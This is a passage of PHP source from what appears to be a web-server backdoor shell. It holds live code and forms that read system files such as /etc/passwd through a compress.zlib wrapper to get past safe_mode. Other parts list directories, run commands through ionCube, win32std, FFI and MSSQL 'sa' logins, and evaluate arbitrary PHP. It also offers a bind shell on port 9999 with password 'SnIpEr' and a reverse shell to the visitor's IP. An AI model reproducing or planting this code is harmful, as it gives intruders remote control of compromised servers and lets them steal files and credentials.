echo sr(25,"File :".$arrow."",in('text','file1',45,(!empty($_POST['file1']))?($_POST['file1']):("/etc/passwd")).in('submit','submit',2,"Read File"));
function rsg_read()
{
$test="";
$temp=tempnam($test, "cx");
$file1=$_POST['file1'];
$get=htmlspecialchars($file1);
echo "
Trying To Get File $get
";
if(copy("compress.zlib://".$file1, $temp)){
$fichier = fopen($temp, "r");
$action = fread($fichier, filesize($temp));
fclose($fichier);
$source=htmlspecialchars($action);
echo "
Found $get";
unlink($temp);
} else {
die("
Sorry... File
".htmlspecialchars($file1)." dosen't exists or you don't have
access.");
}
echo "";
}
if(isset($_POST['file1']))
{
rsg_read();
}
echo $te." | ".$fe.$fs."".$ts;
echo " View Dir ";
echo sr(25,"Dir :".$arrow."",in('text','directory',45,(!empty($_POST['directory']))?($_POST['directory']):("/etc")).in('submit','submit',2,'View'));
function rsg_glob()
{
$chemin=$_POST['directory'];
$files = glob("$chemin*");
echo "Trying To List Folder $chemin
";
echo "";
}
if(isset($_POST['directory']))
{
rsg_glob();
}
echo $te." | ".$fe." ";
echo $fs.$table_up1.div_title($lang[$language.'_text210'],'id210').$table_up2.div('id210').$ts;
echo "";
echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','zend',85,(!empty($_POST['zend'])
?($_POST['zend']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'zend').ws(4).in
('submit','submit',0,$lang[$language.'_butt8']));
echo $te.''.$table_end1.$fe;
if(extension_loaded("ionCube Loader"))
{
echo $fs.$table_up1.div_title($lang[$language.'_text230'],'id230').$table_up2.div('id230').$ts;
echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test14_cmd',96,(!empty($_POST['test14_cmd'])?($_POST['test14_cmd']):(''))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.''.$table_end1.$fe;
}
if($unix&&extension_loaded("win32std"))
{
echo $fs.$table_up1.div_title($lang[$language.'_text231'],'id231').$table_up2.div('id231').$ts;
echo sr(15,"".$lang[$language.'_text3'].$arrow."",in('text','test15_cmd',96,(!empty($_POST['test15_cmd'])?($_POST['test15_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.''.$table_end1.$fe;
}
if($unix&&extension_loaded("win32service"))
{
echo $fs.$table_up1.div_title($lang[$language.'_text232'],'id232').$table_up2.div('id232').$ts;
echo sr(15,"".$lang[$language.'_text3'].$arrow."",in('text','test16_cmd',96,(!empty($_POST['test16_cmd'])?($_POST['test16_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.''.$table_end1.$fe;
}
if($unix&&extension_loaded("ffi"))
{
echo $fs.$table_up1.div_title($lang[$language.'_text132'],'id35').$table_up2.div('id234').$ts;
echo sr(15,"".$lang[$language.'_text3'].$arrow."",in('text','test18_cmd',96,(!empty($_POST['test18_cmd'])?($_POST['test18_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test18').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.''.$table_end1.$fe;
}
$aliases2 = '';
foreach ($aliases as $alias_name=>$alias_cmd)
{
$aliases2 .= "";
}
echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
echo sr(15,"".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."","".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.''.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
echo sr(15,"".$lang[$language.'_text52'].$arrow."",in('text','s_text',85,'').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
echo sr(15,"".$lang[$language.'_text53'].$arrow."",in('text','s_dir',85,$dir)." * ");
echo sr(15,"".$lang[$language.'_text55'].$arrow."",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.php;,asp;.aspx;.cfm')."*".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
echo $te.''.$table_end1.$fe;
if($curl_on)
{
echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.''.$table_end1.$fe;
}
if($mssql_on)
{
echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
echo sr(15,"".$lang[$language.'_text36'].$arrow."",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."".$lang[$language.'_text37'].$arrow."".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."".$lang[$language.'_text38'].$arrow."".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):(""))).ws(4)."".$lang[$language.'_text14'].$arrow."".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
echo sr(15,"".$lang[$language.'_text3'].$arrow."",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.''.$table_end1.$fe;
}
echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
echo "".div('id9')."";
echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
echo "
".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
echo " ";
echo $table_end1.$fe;
{
echo " ";
}
if($unix){
echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."".$fs."| ".$ts;
echo " ".$lang[$language.'_text9']." ";
echo sr(40,"".$lang[$language.'_text10'].$arrow."",in('text','port',15,'9999'));
echo sr(40,"".$lang[$language.'_text11'].$arrow."",in('text','bind_pass',15,'SnIpEr'));
echo sr(40,"".$lang[$language.'_text20'].$arrow."","".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
echo $te." | ".$fe.$fs."".$ts;
echo " ".$lang[$language.'_text12']." ";
echo sr(40,"".$lang[$language.'_text13'].$arrow."",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
echo sr(40,"".$lang[$language.'_text14'].$arrow."",in('text','port',15,'80'));
echo sr(40,"".$lang[$language.'_text20'].$arrow."","".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
echo $te." | ".$fe."
";
}
if($safe_mode)
{
echo $table_up1.div_title($lang[$language.'_text211'],'id211').$table_up2.div('id211').$ts." |